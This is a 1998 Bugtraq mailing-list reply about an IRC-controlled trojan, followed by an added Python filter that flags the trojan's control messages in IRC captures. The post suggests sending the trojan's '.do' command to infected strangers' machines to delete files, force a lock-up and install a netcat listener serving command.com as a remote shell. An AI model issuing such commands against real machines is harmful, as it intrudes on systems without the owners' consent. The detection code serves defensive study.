[8114] in bugtraq


Re: Internet Wide DOS Attack using IRC

daemon@ATHENA.MIT.EDU (George Imburgia)
Sat Oct 3 14:08:29 1998

Date: 	Sat, 3 Oct 1998 08:30:08 -0400
Reply-To: George Imburgia <gti@HOPI.DTCC.EDU>
From: George Imburgia <gti@HOPI.DTCC.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <004901bdee68$73f530a0$48fc60cf@cortex>

On Fri, 2 Oct 1998, Samuel Cossette wrote:

> When a clone (Havoc calls an infected computer a "Drone") is connected on IRC
> anybody can control this with Private msg command (.join #chan, .part, .do
> [raw command]). 2-3 weeks ago the infected chan got about 500-700 drones
> (stable). My personal estimation of infected computers is 15000+.

With the DO command enabled, they gave us the means to remotely disable
this trojan.

Something to the effect of:

msg <nick> .do del c:\windows\system\oce*.*

Then, msg <nick> .do <some evil command to lock up the machine, forcing a
reboot>.

I'd be happy to write something cleaner and more specific, if someone
could forward me a copy of this trojan, or at least a directory listing of
the c:\windows\system directory on an infected machine.

The mIRC DO command is very powerful, and can be used to install netcat on
the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
-p <any port> <your ip> -t -e command.com, giving a remote command prompt
to investigate/disinfect the machine.

Anyone with a copy of this, feel free to mail me here, or contact
Phatass on EFnet.


______________________________________________________________________________
George Imburgia                                      e-mail: gti@hopi.dtcc.edu
Systems Administrator                                Phone:  (302)739-4068
Delaware Technical & Community College               Fax:    (302)739-3345
Office of the President                              Pager:  (302)741-5962
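
A defensive counterpart to the control channel described in the quoted report, as an added example that is not part of the original post: a Python filter over captured raw IRC lines that flags private messages beginning with the `.join`, `.part` or `.do` verbs. The sample capture, nicks and hostnames are constructed, and treating the verb as the first token of the message text is an assumption.

```python
import re

# Control verbs named in the quoted report; assumed to start the message text.
CONTROL = re.compile(r"^\.(join|part|do)\b(?:\s+(.*))?$", re.IGNORECASE)

def parse_irc_line(line):
    """Split one RFC 1459 style line into (prefix, command, params)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None
    params = parts[1:] + ([trailing] if sep else [])
    return prefix, parts[0].upper(), params

def find_drone_commands(lines):
    """Return one dict per private PRIVMSG whose text is a control verb."""
    hits = []
    for number, raw in enumerate(lines, 1):
        msg = parse_irc_line(raw)
        if msg is None:
            continue
        prefix, command, params = msg
        if command != "PRIVMSG" or len(params) < 2:
            continue
        target, text = params[0], params[1]
        if target.startswith(("#", "&")):  # channel chatter, not a private msg
            continue
        match = CONTROL.match(text.strip())
        if match:
            hits.append({"line": number, "sender": (prefix or "").split("!")[0],
                         "target": target, "verb": match.group(1).lower(),
                         "argument": match.group(2) or ""})
    return hits

# Constructed sample capture (not taken from a real network).
SAMPLE = [
    ":alice!a@host.example PRIVMSG #chat :try typing .join #help",
    ":ctrl!c@host.example PRIVMSG drone17 :.join #chan",
    ":ctrl!c@host.example PRIVMSG drone17 :.do PRIVMSG #chan :hello",
    ":bob!b@host.example PRIVMSG carol :see you at .do not disturb",
    ":ctrl!c@host.example PRIVMSG drone17 :.part",
    "PING :irc.example",
]

if __name__ == "__main__":
    print(*find_drone_commands(SAMPLE), sep="\n")
```

Channel messages and text that merely mentions a verb mid-sentence are ignored, so the hits are limited to private messages shaped like the control commands in the report.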
